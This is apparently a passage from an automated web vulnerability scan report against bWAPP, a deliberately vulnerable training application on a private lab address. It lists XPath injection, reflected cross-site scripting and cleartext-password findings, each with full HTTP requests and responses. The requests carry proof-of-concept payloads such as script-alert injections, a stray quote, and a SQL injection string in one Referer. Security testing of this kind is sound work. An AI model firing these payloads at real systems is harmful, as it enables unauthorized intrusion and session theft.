Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.151. http://192.168.52.147/bWAPP/xss_eval.php [bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xss_eval.php

Issue detail

The bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xss_eval.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xss_eval.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security=maybe

bug=1'&form_bug=submit

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:18:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23372

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
2.152. http://192.168.52.147/bWAPP/xss_eval.php [form_bug parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://192.168.52.147
Path:   /bWAPP/xss_eval.php

Issue detail

The form_bug parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the form_bug parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

POST /bWAPP/xss_eval.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/xss_eval.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 21
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security=maybe

bug=1&form_bug=submit'

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 04:05:29 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23369

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
<option value='31'>XML/XPath Injection (Login Form)</option>
...[SNIP]...
3. Cross-site scripting (reflected)
Previous  Next

There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Vulnerability classifications



3.1. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ws_soap.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload thduj"><script>alert(1)</script>i865v was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bWAPP/ws_soap.php/thduj"><script>alert(1)</script>i865v HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 06:10:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 5030
Connection: close
Content-Type: text/html


       <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
       <style type="text/css">
        body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
...[SNIP]...
<a href="/bWAPP/ws_soap.php/thduj"><script>alert(1)</script>i865v?wsdl">
...[SNIP]...
3.2. http://192.168.52.147/bWAPP/ws_soap.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ws_soap.php

Issue detail

The name of an arbitrarily supplied URL parameter is copied into the HTML document as plain text between tags. The payload n8rx2<script>alert(1)</script>l0226 was submitted in the name of an arbitrarily supplied URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bWAPP/ws_soap.php/n8rx2<script>alert(1)</script>l0226 HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 06:10:43 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Content-Length: 5026
Connection: close
Content-Type: text/html


       <html><head><title>NuSOAP: *** bWAPP Movie Service ***</title>
       <style type="text/css">
        body { font-family: arial; color: #000000; background-color: #ffffff; margin: 0px 0px 0px 0px; }
...[SNIP]...
</font> http://192.168.52.147/bWAPP/ws_soap.php/n8rx2<script>alert(1)</script>l0226<br>
...[SNIP]...
4. Cleartext submission of password
Previous  Next

There are 15 instances of this issue:

Issue background

Some applications transmit passwords over unencrypted connections, making them vulnerable to interception. To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

Vulnerability classifications



4.1. http://192.168.52.147/bWAPP/ba_captcha_bypass.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_captcha_bypass.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/ba_captcha_bypass.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13484

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/ba_captcha_bypass.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.2. http://192.168.52.147/bWAPP/ba_insecure_login_2.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_insecure_login_2.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:25 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 15303

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form>

<p>
...[SNIP]...
<br />
<input type="password" id="passphrase" name="passphrase" size="20" /></p>
...[SNIP]...
4.3. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_pwd_attacks_2.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:25 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13504

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/ba_pwd_attacks_2.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.4. http://192.168.52.147/bWAPP/ba_weak_pwd.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ba_weak_pwd.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/ba_weak_pwd.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/sqli_11.php?title=ben%27+OR+%271%27+%3D+%271--&action=search
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:58:20 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13329

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/ba_weak_pwd.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.5. http://192.168.52.147/bWAPP/http_verb_tampering.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/http_verb_tampering.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /bWAPP/http_verb_tampering.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/unrestricted_file_upload.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:55:31 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13382

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/http_verb_tampering.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password_new" name="password_new"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.6. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/insecure_crypt_storage_2.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/insecure_crypt_storage_2.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:25 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13259

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Arc
...[SNIP]...
</p>

<form action="/bWAPP/insecure_crypt_storage_2.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password"></p>
...[SNIP]...
4.7. http://192.168.52.147/bWAPP/ldap_connect.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/ldap_connect.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/ldap_connect.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/htmli_get.php?firstname=mike&lastname=smith&form=submit
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Pragma: no-cache
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:53:01 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 14095

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/ldap_connect.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" value="" size="20" autocomplete="off"></p>
...[SNIP]...
4.8. http://192.168.52.147/bWAPP/login.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/login.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Cookie: PHPSESSID=b2652a9585941cebb6cfa2a30b13c119
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:52:17 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4019
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/login.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off"></p>
...[SNIP]...
4.9. http://192.168.52.147/bWAPP/password_change.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/password_change.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /bWAPP/password_change.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/portal.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:21:08 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13561

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
...[SNIP]...
</p>

<form action="/bWAPP/password_change.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password_curr" name="password_curr"></p>
...[SNIP]...
<br />
<input type="password" id="password_new" name="password_new"></p>
...[SNIP]...
<br />
<input type="password" id="password_conf" name="password_conf"></p>
...[SNIP]...
4.10. http://192.168.52.147/bWAPP/sqli_16.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_16.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/sqli_16.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:14 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13117

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/sqli_16.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.11. http://192.168.52.147/bWAPP/sqli_3.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/sqli_3.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /bWAPP/sqli_3.php HTTP/1.1
Host: 192.168.52.147
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://192.168.52.147/bWAPP/aim.php
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 02:57:13 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13126

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
...[SNIP]...
</p>

<form action="/bWAPP/sqli_3.php" method="POST">

<p>
...[SNIP]...
<br />
<input type="password" id="password" name="password" size="20" autocomplete="off" /></p>
...[SNIP]...
4.12. http://192.168.52.147/bWAPP/user_extra.php
Previous  Next

Summary

Severity:   High
Confidence:   Certain
Host:   http://192.168.52.147
Path:   /bWAPP/user_extra.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /bWAPP/user_extra.php HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://192.168.52.147/bWAPP/portal.php
Accept-Language: en-US,en;q=0.7,ja;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 192.168.52.147
Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Mar 2018 03:21:21 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.4-2ubuntu5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 13910

<!DOCTYPE html>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
